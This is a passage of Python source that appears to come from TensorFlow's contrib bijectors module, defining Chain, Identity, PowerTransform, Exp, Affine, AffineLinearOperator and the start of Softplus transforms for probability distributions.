for correctness.
name: `String`, name given to ops managed by this object. Default: E.g.,
`Chain([Exp(), Softplus()]).name == "chain_of_exp_of_softplus"`.
Raises:
ValueError: if bijectors have different dtypes.
"""
self._bijectors = bijectors
dtype = list(set([b.dtype for b in bijectors]))
if len(dtype) > 2:
raise ValueError("incompatible dtypes: %s" % dtype)
elif len(dtype) == 2:
dtype = dtype[1] if dtype[0] is None else dtype[0]
elif len(dtype) == 1:
dtype = dtype[0]
else:
dtype = None
super(Chain, self).__init__(
graph_parents=list(itertools.chain.from_iterable(
b.graph_parents for b in bijectors)),
is_constant_jacobian=all(b.is_constant_jacobian for b in bijectors),
validate_args=validate_args,
dtype=dtype,
name=name or ("identity" if not bijectors else
"_of_".join(["chain"] + [b.name for b in bijectors])))
@property
def bijectors(self):
return self._bijectors
def _shape_helper(self, func_name, input_shape, reverse):
new_shape = input_shape
for b in reversed(self.bijectors) if reverse else self.bijectors:
func = getattr(b, func_name, None)
if func is None:
raise ValueError("unable to call %s on bijector %s (%s)" %
(func_name, b.name, func))
new_shape = func(new_shape)
return new_shape
def _get_forward_event_shape(self, input_shape):
return self._shape_helper("get_forward_event_shape", input_shape,
reverse=True)
def _forward_event_shape(self, input_shape):
return self._shape_helper("forward_event_shape", input_shape, reverse=True)
def _get_inverse_event_shape(self, output_shape):
return self._shape_helper("get_inverse_event_shape", output_shape,
reverse=False)
def _inverse_event_shape(self, output_shape):
return self._shape_helper("inverse_event_shape", output_shape,
reverse=False)
def _forward(self, x, **condition_kwargs):
y = x
for b in reversed(self.bijectors):
y = b.forward(y, **condition_kwargs.get(b.name, {}))
return y
def _inverse_and_inverse_log_det_jacobian(self, y, **condition_kwargs):
x = y
ildj = constant_op.constant(0., dtype=x.dtype,
name="inverse_log_det_jacobian")
for b in self.bijectors:
x, j = b.inverse_and_inverse_log_det_jacobian(
x, **condition_kwargs.get(b.name, {}))
ildj += j
return x, ildj
def _forward_log_det_jacobian(self, x, **condition_kwargs):
y = x
fldj = constant_op.constant(0., dtype=x.dtype,
name="forward_log_det_jacobian")
for b in reversed(self.bijectors):
bijector_condition_kwargs = condition_kwargs.get(b.name, {})
fldj += b.forward_log_det_jacobian(y, **bijector_condition_kwargs)
y = b.forward(y, **bijector_condition_kwargs)
return fldj
class Identity(Bijector):
"""Bijector which computes Y = g(X) = X.
Example Use:
```python
# Create the Y=g(X)=X transform which is intended for Tensors with 1 batch
# ndim and 1 event ndim (i.e., vector of vectors).
identity = Identity(batch_ndims=1, event_ndims=1)
x = [[1., 2],
[3, 4]]
x == identity.forward(x) == identity.inverse(x)
```
"""
def __init__(self, validate_args=False, name="identity"):
super(Identity, self).__init__(
is_constant_jacobian=True,
validate_args=validate_args,
name=name)
def _forward(self, x):
return x
def _inverse_and_inverse_log_det_jacobian(self, y):
return y, constant_op.constant(0., dtype=y.dtype)
def _forward_log_det_jacobian(self, x):
return constant_op.constant(0., dtype=x.dtype)
class PowerTransform(Bijector):
"""Bijector which computes `Y = g(X) = (1 + X * c)**(1 / c), X >= -1 / c`.
The [power transform](https://en.wikipedia.org/wiki/Power_transform) maps
inputs from `[0, inf]` to `[-1/c, inf]`; this is equivalent to the `inverse`
of this bijector.
This bijector is equivalent to the `Exp` bijector when `c=0`.
"""
def __init__(self,
power=0.,
event_ndims=0,
validate_args=False,
name="power_transform"):
"""Instantiates the `PowerTransform` bijector.
Args:
power: Python `float` scalar indicating the transform power, i.e.,
`Y = g(X) = (1 + X * c)**(1 / c)` where `c` is the `power`.
event_ndims: Python scalar indicating the number of dimensions associated
with a particular draw from the distribution.
validate_args: `Boolean` indicating whether arguments should be checked
for correctness.
name: `String` name given to ops managed by this object.
Raises:
ValueError: if `power < 0` or is not known statically.
"""
self._graph_parents = []
self._name = name
self._validate_args = validate_args
with self._name_scope("init", values=[power]):
power = tensor_util.constant_value(
ops.convert_to_tensor(power, name="power"))
if power is None or power < 0:
raise ValueError("`power` must be a non-negative TF constant.")
self._power = power
super(PowerTransform, self).__init__(
batch_ndims=0,
event_ndims=event_ndims,
validate_args=validate_args,
name=name)
@property
def power(self):
"""The `c` in: `Y = g(X) = (1 + X * c)**(1 / c)`."""
return self._power
def _forward(self, x):
x = self._maybe_assert_valid_x(x)
if self.power == 0.:
return math_ops.exp(x)
# TODO(jvdillon): If large x accuracy is an issue, consider using
# (1. + x * self.power)**(1. / self.power) when x >> 1.
return math_ops.exp(math_ops.log1p(x * self.power) / self.power)
def _inverse_and_inverse_log_det_jacobian(self, y):
y = self._maybe_assert_valid_y(y)
if self.shaper is None:
raise ValueError("Jacobian cannot be computed with unknown event_ndims")
_, _, event_dims = self.shaper.get_dims(y)
if self.power == 0.:
x = math_ops.log(y)
ildj = -math_ops.reduce_sum(x, reduction_indices=event_dims)
return x, ildj
# TODO(jvdillon): If large y accuracy is an issue, consider using
# (y**self.power - 1.) / self.power when y >> 1.
x = _expm1(math_ops.log(y) * self.power) / self.power
ildj = (self.power - 1.) * math_ops.reduce_sum(
math_ops.log(y),
reduction_indices=event_dims)
return x, ildj
def _forward_log_det_jacobian(self, x):
x = self._maybe_assert_valid_x(x)
if self.shaper is None:
raise ValueError("Jacobian cannot be computed with unknown event_ndims")
_, _, event_dims = self.shaper.get_dims(x)
if self.power == 0.:
return math_ops.reduce_sum(x, reduction_indices=event_dims)
return (1. / self.power - 1.) * math_ops.reduce_sum(
math_ops.log1p(x * self.power),
reduction_indices=event_dims)
def _maybe_assert_valid_x(self, x):
if not self.validate_args or self.power == 0.:
return x
is_valid = check_ops.assert_non_negative(
1. + self.power * x,
message="Forward transformation input must be at least {}.".format(
-1. / self.power))
return control_flow_ops.with_dependencies([is_valid], x)
def _maybe_assert_valid_y(self, y):
if not self.validate_args:
return y
is_valid = check_ops.assert_positive(
y, message="Inverse transformation input must be greater than 0.")
return control_flow_ops.with_dependencies([is_valid], y)
class Exp(PowerTransform):
"""Bijector which computes Y = g(X) = exp(X).
Example Use:
```python
# Create the Y=g(X)=exp(X) transform which works only on Tensors with 1
# batch ndim and 2 event ndims (i.e., vector of matrices).
exp = Exp(batch_ndims=1, event_ndims=2)
x = [[[1., 2],
[3, 4]],
[[5, 6],
[7, 8]]]
exp(x) == exp.forward(x)
log(x) == exp.inverse(x)
```
Note: the exp(.) is applied element-wise but the Jacobian is a reduction
over the event space.
"""
def __init__(self,
event_ndims=0,
validate_args=False,
name="exp"):
"""Instantiates the `Exp` bijector.
Args:
event_ndims: Scalar `int32` `Tensor` indicating the number of dimensions
associated with a particular draw from the distribution.
validate_args: `Boolean` indicating whether arguments should be checked
for correctness.
name: `String` name given to ops managed by this object.
"""
super(Exp, self).__init__(
event_ndims=event_ndims,
validate_args=validate_args,
name=name)
# TODO(srvasude): Deprecate this class with a dedicated Linear Operator
# corresponding to TriL + V D V.T.
class _TriLPlusVDVTLightweightOperatorPD(object):
"""Helper/hidden class fake an OperatorPD for TriL+VDV.T."""
def __init__(self, tril, v, diag=None, validate_args=False):
"""Creates an instance of _TriLPlusVDVTLightweightOperatorPD.
WARNING: This object is not to be used outside of `Affine` where it is
currently being temporarily used for refactoring purposes.
Args:
tril: `Tensor` of shape `[B1,..,Bb, d, d]`.
v: `Tensor` of shape `[B1,...,Bb, d, k]`.
diag: `Tensor` of shape `[B1,...,Bb, k, k]` or None
validate_args: `Boolean` indicating whether arguments should be checked
for correctness.
"""
self._m = tril
self._v = v
self._validate_args = validate_args
self._inputs = [tril, v]
if diag is not None:
self._inputs += [diag]
self._d = operator_pd_diag.OperatorPDDiag(diag, verify_pd=validate_args)
self._d_inv = operator_pd_diag.OperatorPDDiag(1. / diag,
verify_pd=validate_args)
return
if v.get_shape().is_fully_defined():
v_shape = v.get_shape().as_list()
id_shape = v_shape[:-2] + [v_shape[-1], v_shape[-1]]
else:
v_shape = array_ops.shape(v)
id_shape = array_ops.concat_v2(
[v_shape[:-2], [v_shape[-1], v_shape[-1]]], 0)
self._d = operator_pd_identity.OperatorPDIdentity(
id_shape, v.dtype, verify_pd=self.validate_args)
self._d_inv = self._d
@property
def inputs(self):
return self._inputs
@property
def dtype(self):
return self._m.dtype.base_dtype
@property
def validate_args(self):
return self._validate_args
def rank(self):
"""Returns `rank(self)`."""
return array_ops.rank(self._m)
def sqrt_matmul(self, x):
"""Computes `matmul(self, x)`.
Doesn't actually do the sqrt! Named as such to agree with API.
Args:
x: `Tensor`
Returns:
self_times_x: `Tensor`
"""
m_x = math_ops.matmul(self._m, x)
vt_x = math_ops.matmul(self._v, x, adjoint_a=True)
d_vt_x = self._d.matmul(vt_x)
v_d_vt_x = math_ops.matmul(self._v, d_vt_x)
return m_x + v_d_vt_x
def sqrt_solve(self, x):
"""Computes `solve(self, x)`.
Doesn't actually do the sqrt! Named as such to agree with API.
To compute (M + V D V.T), we use the the Woodbury matrix identity:
inv(M + V D V.T) = inv(M) - inv(M) V inv(C) V.T inv(M)
where,
C = inv(D) + V.T inv(M) V.
See: https://en.wikipedia.org/wiki/Woodbury_matrix_identity
Args:
x: `Tensor`
Returns:
inv_of_self_times_x: `Tensor`
"""
minv_x = linalg_ops.matrix_triangular_solve(self._m, x)
vt_minv_x = math_ops.matmul(self._v, minv_x, transpose_a=True)
cinv_vt_minv_x = linalg_ops.matrix_solve(
self._woodbury_sandwiched_term(), vt_minv_x)
v_cinv_vt_minv_x = math_ops.matmul(self._v, cinv_vt_minv_x)
minv_v_cinv_vt_minv_x = linalg_ops.matrix_triangular_solve(
self._m, v_cinv_vt_minv_x)
return minv_x - minv_v_cinv_vt_minv_x
def sqrt_log_abs_det(self):
"""Computes (log o abs o det)(X) for matrix X.
Doesn't actually do the sqrt! Named as such to agree with API.
To compute det(M + V D V.T), we use the matrix determinant lemma:
det(Tril + V D V.T) = det(C) det(D) det(M)
where C is defined as in `_inverse`, ie,
C = inv(D) + V.T inv(M) V.
See: https://en.wikipedia.org/wiki/Matrix_determinant_lemma
Returns:
log_abs_det: `Tensor`.
"""
log_det_c = math_ops.log(math_ops.abs(
linalg_ops.matrix_determinant(self._woodbury_sandwiched_term())))
# Reduction is ok because we always prepad inputs to this class.
log_det_m = math_ops.reduce_sum(math_ops.log(math_ops.abs(
array_ops.matrix_diag_part(self._m))), reduction_indices=[-1])
return log_det_c + 2. * self._d.sqrt_log_abs_det() + log_det_m
def _woodbury_sandwiched_term(self):
"""Computes the sandwiched term in the Woodbury identity.
Computes the "`C`" in the the identity:
inv(M + V D V.T) = inv(M) - inv(M) V inv(C) V.T inv(M)
where,
C = inv(D) + V.T inv(M) V.
See: https://en.wikipedia.org/wiki/Woodbury_matrix_identity
Returns:
woodbury_sandwich_term: A `Tensor` to be used like `C`, above.
"""
minv_v = linalg_ops.matrix_triangular_solve(self._m, self._v)
vt_minv_v = math_ops.matmul(self._v, minv_v, adjoint_a=True)
return self._d_inv.add_to_tensor(vt_minv_v)
class Affine(Bijector):
# pylint: disable=line-too-long
"""Bijector which computes `Y = g(X; shift, scale) = matmul(scale, X) + shift` where `scale = c * I + diag(D1) + tril(L) + V @ diag(D2) @ V.T`.
Write `A @ X` for `matmul(A, X)`. In TF parlance, the `scale` term is
logically equivalent to:
```python
scale = (
scale_identity_multiplier * tf.diag(tf.ones(d)) +
tf.diag(scale_diag) +
scale_tril +
scale_perturb_factor @ diag(scale_perturb_diag) @
tf.transpose([scale_perturb_factor])
)
```
The `scale` term is applied without necessarily materializing constituent
matrices, i.e., the matmul is [matrix-free](
https://en.wikipedia.org/wiki/Matrix-free_methods) when possible.
Examples:
```python
# Y = X
b = Affine()
# Y = X + shift
b = Affine(shift=[1., 2, 3])
# Y = 2 * I @ X.T + shift
b = Affine(shift=[1., 2, 3],
scale_identity_multiplier=2.)
# Y = tf.diag(d1) @ X.T + shift
b = Affine(shift=[1., 2, 3],
scale_diag=[-1., 2, 1]) # Implicitly 3x3.
# Y = (I + v * v.T) @ X.T + shift
b = Affine(shift=[1., 2, 3],
scale_perturb_factor=[[1., 0],
[0, 1],
[1, 1]])
# Y = (diag(d1) + v * diag(d2) * v.T) @ X.T + shift
b = Affine(shift=[1., 2, 3],
scale_diag=[1., 3, 3], # Implicitly 3x3.
scale_perturb_diag=[2., 1], # Implicitly 2x2.
scale_perturb_factor=[[1., 0],
[0, 1],
[1, 1]])
```
"""
# pylint: enable=line-too-long
def __init__(self,
shift=None,
scale_identity_multiplier=None,
scale_diag=None,
scale_tril=None,
scale_perturb_factor=None,
scale_perturb_diag=None,
event_ndims=1,
validate_args=False,
name="affine"):
"""Instantiates the `Affine` bijector.
This `Bijector` is initialized with `shift` `Tensor` and `scale` arguments,
giving the forward operation:
```none
Y = g(X) = scale @ X + shift
```
where the `scale` term is logically equivalent to:
```python
scale = (
scale_identity_multiplier * tf.diag(tf.ones(d)) +
tf.diag(scale_diag) +
scale_tril +
scale_perturb_factor @ diag(scale_perturb_diag) @
tf.transpose([scale_perturb_factor])
)
```
If none of `scale_identity_multiplier`, `scale_diag`, or `scale_tril` are
specified then `scale += IdentityMatrix`. Otherwise specifying a
`scale` argument has the semantics of `scale += Expand(arg)`, i.e.,
`scale_diag != None` means `scale += tf.diag(scale_diag)`.
Args:
shift: Numeric `Tensor`. If this is set to `None`, no shift is applied.
scale_identity_multiplier: floating point rank 0 `Tensor` representing a
scaling done to the identity matrix.
When `scale_identity_multiplier = scale_diag=scale_tril = None` then
`scale += IdentityMatrix`. Otherwise no scaled-identity-matrix is added
to `scale`.
scale_diag: Numeric `Tensor` representing the diagonal matrix.
`scale_diag` has shape [N1, N2, ... k], which represents a k x k
diagonal matrix.
When `None` no diagonal term is added to `scale`.
scale_tril: Numeric `Tensor` representing the diagonal matrix.
`scale_diag` has shape [N1, N2, ... k, k], which represents a k x k
lower triangular matrix.
When `None` no `scale_tril` term is added to `scale`.
scale_perturb_factor: Numeric `Tensor` representing factor matrix with
last two dimensions of shape `(k, r)`.
When `None`, no rank-r update is added to `scale`.
scale_perturb_diag: Numeric `Tensor` representing the diagonal matrix.
`scale_perturb_diag` has shape [N1, N2, ... r], which represents an
r x r Diagonal matrix.
When `None` low rank updates will take the form `scale_perturb_factor *
scale_perturb_factor.T`.
event_ndims: Scalar `int32` `Tensor` indicating the number of dimensions
associated with a particular draw from the distribution. Must be 0 or 1.
validate_args: `Boolean` indicating whether arguments should be checked
for correctness.
name: `String` name given to ops managed by this object.
Raises:
ValueError: if `perturb_diag` is specified but not `perturb_factor`.
TypeError: if `shift` has different `dtype` from `scale` arguments.
"""
self._graph_parents = []
self._name = name
self._validate_args = validate_args
# Ambiguous definition of low rank update.
if scale_perturb_diag is not None and scale_perturb_factor is None:
raise ValueError("When scale_perturb_diag is specified, "
"scale_perturb_factor must be specified.")
# Special case, only handling a scaled identity matrix. We don't know its
# dimensions, so this is special cased.
# We don't check identity_multiplier, since below we set it to 1. if all
# other scale args are None.
self._is_only_identity_multiplier = (scale_tril is None and
scale_diag is None and
scale_perturb_factor is None)
# When no args are specified, pretend the scale matrix is the identity
# matrix.
if self._is_only_identity_multiplier and scale_identity_multiplier is None:
scale_identity_multiplier = 1.
with self._name_scope("init", values=[
shift, scale_identity_multiplier, scale_diag, scale_tril,
scale_perturb_diag, scale_perturb_factor, event_ndims]):
event_ndims = ops.convert_to_tensor(event_ndims, name="event_ndims")
if validate_args:
is_less_than_two = check_ops.assert_less(
event_ndims, 2,
message="event_ndims must be 0 or 1")
event_ndims = control_flow_ops.with_dependencies(
[is_less_than_two], event_ndims)
self._shift = _as_tensor(shift, "shift")
# self._create_scale_operator returns an OperatorPD in all cases except if
# self._is_only_identity_multiplier; in which case it returns a scalar
# Tensor.
self._scale = self._create_scale_operator(
identity_multiplier=scale_identity_multiplier,
diag=scale_diag,
tril=scale_tril,
perturb_diag=scale_perturb_diag,
perturb_factor=scale_perturb_factor,
event_ndims=event_ndims,
validate_args=validate_args)
if (self._shift is not None and
self._shift.dtype.base_dtype != self._scale.dtype.base_dtype):
raise TypeError("shift.dtype({}) does not match scale.dtype({})".format(
self._shift.dtype, self._scale.dtype))
super(Affine, self).__init__(
batch_ndims=self._infer_batch_ndims(),
event_ndims=event_ndims,
graph_parents=(
[event_ndims] +
[self._scale] if contrib_framework.is_tensor(self._scale)
else self._scale.inputs +
[self._shift] if self._shift is not None else []),
is_constant_jacobian=True,
validate_args=validate_args,
name=name)
def _create_scale_operator(self, identity_multiplier, diag, tril,
perturb_diag, perturb_factor, event_ndims,
validate_args):
"""Construct `scale` from various components.
Args:
identity_multiplier: floating point rank 0 `Tensor` representing a scaling
done to the identity matrix.
diag: Numeric `Tensor` representing the diagonal matrix. `scale_diag` has
shape [N1, N2, ... k], which represents a k x k diagonal matrix.
tril: Numeric `Tensor` representing the diagonal matrix. `scale_tril` has
shape [N1, N2, ... k], which represents a k x k lower triangular matrix.
perturb_diag: Numeric `Tensor` representing the diagonal matrix of the
low rank update.
perturb_factor: Numeric `Tensor` representing factor matrix.
event_ndims: Scalar `int32` `Tensor` indicating the number of dimensions
associated with a particular draw from the distribution. Must be 0 or 1
validate_args: `Boolean` indicating whether arguments should be checked
for correctness.
Returns:
scale and batch_ndims. In the case of scaling by a constant, scale is a
floating point `Tensor`. Otherwise, scale is an `OperatorPD`.
Raises:
ValueError: if all of `tril`, `diag` and `identity_multiplier` are `None`.
"""
identity_multiplier = _as_tensor(identity_multiplier, "identity_multiplier")
diag = _as_tensor(diag, "diag")
tril = _as_tensor(tril, "tril")
perturb_diag = _as_tensor(perturb_diag, "perturb_diag")
perturb_factor = _as_tensor(perturb_factor, "perturb_factor")
identity_multiplier = self._maybe_validate_identity_multiplier(
identity_multiplier, validate_args)
if perturb_factor is not None:
perturb_factor = self._process_matrix(
perturb_factor, min_rank=2, event_ndims=event_ndims)
if perturb_diag is not None:
perturb_diag = self._process_matrix(
perturb_diag, min_rank=1, event_ndims=event_ndims)
# The following if-statments are ordered by increasingly stronger
# assumptions in the base matrix, i.e., we process in the order:
# TriL, Diag, Identity.
if tril is not None:
tril = self._preprocess_tril(
identity_multiplier, diag, tril, event_ndims)
if perturb_factor is None:
return operator_pd_cholesky.OperatorPDCholesky(
tril, verify_pd=validate_args)
return _TriLPlusVDVTLightweightOperatorPD(
tril=tril, v=perturb_factor, diag=perturb_diag,
validate_args=validate_args)
if diag is not None:
diag = self._preprocess_diag(identity_multiplier, diag, event_ndims)
if perturb_factor is None:
return operator_pd_diag.OperatorPDSqrtDiag(
diag, verify_pd=validate_args)
return operator_pd_vdvt_update.OperatorPDSqrtVDVTUpdate(
operator=operator_pd_diag.OperatorPDDiag(
diag, verify_pd=validate_args),
v=perturb_factor,
diag=perturb_diag,
verify_pd=validate_args)
if identity_multiplier is not None:
if perturb_factor is None:
return identity_multiplier
# Infer the shape from the V and D.
v_shape = array_ops.shape(perturb_factor)
identity_shape = array_ops.concat_v2((v_shape[:-1], (v_shape[-2],)), 0)
scaled_identity = operator_pd_identity.OperatorPDIdentity(
identity_shape,
perturb_factor.dtype.base_dtype,
scale=identity_multiplier,
verify_pd=validate_args)
return operator_pd_vdvt_update.OperatorPDSqrtVDVTUpdate(
operator=scaled_identity,
v=perturb_factor,
diag=perturb_diag,
verify_pd=validate_args)
raise ValueError("One of tril, diag and/or identity_multiplier must be "
"specified.")
def _maybe_validate_identity_multiplier(self, identity_multiplier,
validate_args):
"""Check that the init arg `identity_multiplier` is valid."""
if identity_multiplier is None or not validate_args:
return identity_multiplier
if validate_args:
identity_multiplier = control_flow_ops.with_dependencies(
[check_ops.assert_positive(identity_multiplier)],
identity_multiplier)
return identity_multiplier
def _preprocess_tril(self, identity_multiplier, diag, tril, event_ndims):
"""Helper to preprocess a lower triangular matrix."""
tril = array_ops.matrix_band_part(tril, -1, 0) # Zero out TriU.
if identity_multiplier is None and diag is None:
return self._process_matrix(tril, min_rank=2, event_ndims=event_ndims)
new_diag = array_ops.matrix_diag_part(tril)
if identity_multiplier is not None:
new_diag += identity_multiplier
if diag is not None:
new_diag += diag
tril = array_ops.matrix_set_diag(tril, new_diag)
return self._process_matrix(tril, min_rank=2, event_ndims=event_ndims)
def _preprocess_diag(self, identity_multiplier, diag, event_ndims):
"""Helper to preprocess a diagonal matrix."""
if identity_multiplier is not None:
diag += identity_multiplier
return self._process_matrix(diag, min_rank=1, event_ndims=event_ndims)
def _process_matrix(self, matrix, min_rank, event_ndims):
"""Helper to __init__ which gets matrix in batch-ready form."""
# Pad the matrix so that matmul works in the case of a matrix and vector
# input. Keep track if the matrix was padded, to distinguish between a
# rank 3 tensor and a padded rank 2 tensor.
# TODO(srvasude): Remove side-effects from functions. Its currently unbroken
# but error-prone since the function call order may change in the future.
self._rank_two_event_ndims_one = math_ops.logical_and(
math_ops.equal(array_ops.rank(matrix), min_rank),
math_ops.equal(event_ndims, 1))
left = array_ops.where(self._rank_two_event_ndims_one, 1, 0)
pad = array_ops.concat_v2([
array_ops.ones([left], dtype=dtypes.int32),
array_ops.shape(matrix)], 0)
return array_ops.reshape(matrix, pad)
def _infer_batch_ndims(self):
"""Return batch_ndims."""
if self._is_only_identity_multiplier:
return 0
# The real batch dims is one less when we pad in the case of event_ndims =
# 1, and the rank of the underlying scale being 2. This allows us to have
# non-negative sample dims.
return (self._scale.rank() - 2 -
array_ops.where(self._rank_two_event_ndims_one, 1, 0))
@property
def shift(self):
return self._shift
@property
def scale(self):
# TODO(srvasude): Remove this exception once TriLPlusVDVT is properly
# implemented.
if isinstance(self._scale, _TriLPlusVDVTLightweightOperatorPD):
raise NotImplementedError("Cannot access scale when Tril+VDV.T.")
return self._scale
def _forward(self, x):
y = x
if self._is_only_identity_multiplier:
y *= self._scale
if self.shift is not None:
return y + self.shift
return y
y, sample_shape = self.shaper.make_batch_of_event_sample_matrices(y)
y = self._scale.sqrt_matmul(y)
y = self.shaper.undo_make_batch_of_event_sample_matrices(y, sample_shape)
if self.shift is not None:
return y + self.shift
return y
def _inverse(self, y):
x = y
if self.shift is not None:
x -= self.shift
if self._is_only_identity_multiplier:
return x / self._scale
x, sample_shape = self.shaper.make_batch_of_event_sample_matrices(x)
x = self._scale.sqrt_solve(x)
x = self.shaper.undo_make_batch_of_event_sample_matrices(x, sample_shape)
return x
def _inverse_log_det_jacobian(self, y):
return -self._forward_log_det_jacobian(y)
def _forward_log_det_jacobian(self, x):
if self._is_only_identity_multiplier:
# TODO(jvdillon): We don't pad in this case and instead let the fldj be
# applied via broadcast.
d = math_ops.cast(array_ops.shape(x)[-1], dtype=self._scale.dtype)
return math_ops.log(math_ops.abs(self._scale)) * array_ops.where(
math_ops.equal(self.shaper.event_ndims, 0), 1., d)
fldj = self._scale.sqrt_log_abs_det()
# We need to squeeze off the padded dimension.
start = array_ops.where(self._rank_two_event_ndims_one, 1, 0)
return array_ops.reshape(fldj, array_ops.shape(fldj)[start:])
class AffineLinearOperator(Bijector):
"""Bijector which computes `Y = g(X; shift, scale) = scale @ X.T + shift`.
`shift` is a numeric `Tensor` and `scale` is a `LinearOperator`.
If `X` is a scalar then the forward transformation is: `scale * X + shift`
where `*` denotes the scalar product.
Note: we don't always simply transpose `X` (but write it this way for
brevity). Actually the input `X` undergoes the following transformation
before being premultiplied by `scale`:
1. If there are no sample dims, we call `X = tf.expand_dims(X, 0)`, i.e.,
`new_sample_shape = [1]`. Otherwise do nothing.
2. The sample shape is flattened to have one dimension, i.e.,
`new_sample_shape = [n]` where `n = tf.reduce_prod(old_sample_shape)`.
3. The sample dim is cyclically rotated left by 1, i.e.,
`new_shape = [B1,...,Bb, k, n]` where `n` is as above, `k` is the
event_shape, and `B1,...,Bb` are the batch shapes for each of `b` batch
dimensions.
(For more details see `shape.make_batch_of_event_sample_matrices`.)
The result of the above transformation is that `X` can be regarded as a batch
of matrices where each column is a draw from the distribution. After
premultiplying by `scale`, we take the inverse of this procedure. The input
`Y` also undergoes the same transformation before/after premultiplying by
`inv(scale)`.
Example Use:
```python
linalg = tf.contrib.linalg
x = [1., 2, 3]
shift = [-1., 0., 1]
diag = [1., 2, 3]
scale = linalg.LinearOperatorDiag(diag)
affine = AffineLinearOperator(shift, scale)
# In this case, `forward` is equivalent to:
# diag * scale + shift
y = affine.forward(x) # [0., 4, 10]
shift = [2., 3, 1]
tril = [[1., 0, 0],
[2, 1, 0],
[3, 2, 1]]
scale = linalg.LinearOperatorTriL(tril)
affine = AffineLinearOperator(shift, scale)
# In this case, `forward` is equivalent to:
# np.squeeze(np.matmul(tril, np.expand_dims(x, -1)), -1) + shift
y = affine.forward(x) # [3., 7, 11]
```
"""
def __init__(self,
shift=None,
scale=None,
event_ndims=1,
validate_args=False,
name="affine_linear_operator"):
"""Instantiates the `AffineLinearOperator` bijector.
Args:
shift: Numeric `Tensor`.
scale: Subclass of `LinearOperator`. Represents the (batch) positive
definite matrix `M` in `R^{k x k}`.
event_ndims: Scalar `integer` `Tensor` indicating the number of dimensions
associated with a particular draw from the distribution. Must be 0 or 1.
validate_args: `Boolean` indicating whether arguments should be checked
for correctness.
name: `String` name given to ops managed by this object.
Raises:
ValueError: if `event_ndims` is not 0 or 1.
TypeError: if `scale` is not a `LinearOperator`.
TypeError: if `shift.dtype` does not match `scale.dtype`.
ValueError: if not `scale.is_non_singular`.
"""
self._graph_parents = []
self._name = name
self._validate_args = validate_args
graph_parents = []
with self._name_scope("init", values=[shift]):
event_ndims = ops.convert_to_tensor(event_ndims, name="event_ndims")
if tensor_util.constant_value(event_ndims) is not None:
event_ndims = tensor_util.constant_value(event_ndims)
if event_ndims not in (0, 1):
raise ValueError("event_ndims({}) was not 0 or 1".format(event_ndims))
else:
if validate_args:
# Shape tool will catch if event_ndims is negative.
event_ndims = control_flow_ops.with_dependencies(
[check_ops.assert_less(
event_ndims, 2, message="event_ndims must be 0 or 1")],
event_ndims)
graph_parents += [event_ndims]
if shift is not None:
shift = ops.convert_to_tensor(shift, name="shift")
graph_parents += [shift]
self._shift = shift
if scale is not None:
if (shift is not None and
shift.dtype.base_dtype != scale.dtype.base_dtype):
raise TypeError(
"shift.dtype({}) is incompatible with scale.dtype({}).".format(
shift.dtype, scale.dtype))
if not isinstance(scale, linear_operator.LinearOperator):
raise TypeError("scale is not an instance of tf.LinearOperator")
if validate_args and not scale.is_non_singular:
raise ValueError("Scale matrix must be non-singular.")
graph_parents += scale.graph_parents
if scale.tensor_rank is not None:
batch_ndims = scale.tensor_rank - 2
else:
batch_ndims = scale.tensor_rank_dynamic() - 2
graph_parents += [batch_ndims]
else:
batch_ndims = 0 # We won't need shape inference when scale is None.
self._scale = scale
super(AffineLinearOperator, self).__init__(
batch_ndims=batch_ndims,
event_ndims=event_ndims,
graph_parents=graph_parents,
is_constant_jacobian=True,
validate_args=validate_args,
name=name)
@property
def shift(self):
"""The `shift` `Tensor` in `Y = scale @ X.T + shift`."""
return self._shift
@property
def scale(self):
"""The `scale` `LinearOperator` in `Y = scale @ X.T + shift`."""
return self._scale
def _forward(self, x):
y = x
if self.scale is not None:
y, sample_shape = self.shaper.make_batch_of_event_sample_matrices(
y, expand_batch_dim=False)
with ops.control_dependencies([self.scale.assert_non_singular()] if
self.validate_args else []):
y = self.scale.apply(y)
y = self.shaper.undo_make_batch_of_event_sample_matrices(
y, sample_shape, expand_batch_dim=False)
if self.shift is not None:
y += self.shift
return y
def _inverse(self, y):
x = y
if self.shift is not None:
x -= self.shift
if self.scale is not None:
x, sample_shape = self.shaper.make_batch_of_event_sample_matrices(
x, expand_batch_dim=False)
# Solve fails if the op is singular so we may safely skip this assertion.
x = self.scale.solve(x)
x = self.shaper.undo_make_batch_of_event_sample_matrices(
x, sample_shape, expand_batch_dim=False)
return x
def _inverse_log_det_jacobian(self, y):
return -self._forward_log_det_jacobian(y)
def _forward_log_det_jacobian(self, x): # pylint: disable=unused-argument
if self.scale is None:
return constant_op.constant(0, dtype=x.dtype.base_dtype)
with ops.control_dependencies([self.scale.assert_non_singular()] if
self.validate_args else []):
return self.scale.log_abs_determinant()
class Softplus(Bijector):
"""Bijector which computes `Y = g(X) = Log[1 + exp(X)]`.
The softplus `Bijector` has the following two useful properties:
* The domain is the positive real numbers
* `softplus(x) approx x`, for large `x`, so it does not overflow as easily as
the `Exp` `Bijector`.
Example Use:
```python
# Create the Y=g(X)=softplus(X) transform which works only on Tensors with 1
# batch ndim and 2 event ndims (i.e., vector of matrices).
softplus = Softplus(batch_ndims=1, event_ndims=2)
x = [[[1., 2],
[3, 4]],
[[5, 6],
[7, 8]]]
log(1 + exp(x)) == softplus.forward(x)
log(exp(x) - 1) == softplus.inverse(x)
```
Note: log(.) and exp(.) are applied element-wise but the Jacobian is a
reduction over the event space.
"""
def __init__(self,
event_ndims=0,
validate_args=False,
name="softplus"):
super(Softplus, self).__init__(
batch_ndims=0,
event_ndims=event_ndims,
validate_args=validate_args,
name=name)
def _forward(self, x):
return nn_ops.softplus(x)
def _inverse_and_inverse_log_det_jacobian(self, y):
# The most stable inverse of softplus is not the most obvious one.
# y = softplus(x) = Log[1 + exp{x}], (which means y > 0).
# ==> exp{y} = 1 + exp{x} (1)
# ==> x = Log[exp{y} - 1] (2)
# = Log[(exp{y} - 1) / exp{y}] + Log[exp{y}]
# = Log[(1 - exp{-y}) / 1] + Log[exp{y}]
# = Log[1 - exp{-y}] + y (3)
# (2) is the "obvious" inverse, but (3) is more stable than (2) for large y.
# For small y (e.g. y = 1e-10), (3) will become -inf since 1 - exp{-y} will
# be zero. To fix this, we use 1 - exp{-y} approx y for small y > 0.
#
# Stable inverse log det jacobian.
# Y = Log[1 + exp{X}] ==> X = Log[exp{Y} - 1]
# ==> dX/dY = exp{Y} / (exp{Y} - 1)
# = 1 / (1 - exp{-Y}),
# which is the most stable for large Y > 0. For small Y, we use
# 1 - exp{-Y} approx Y.
if self.shaper is None:
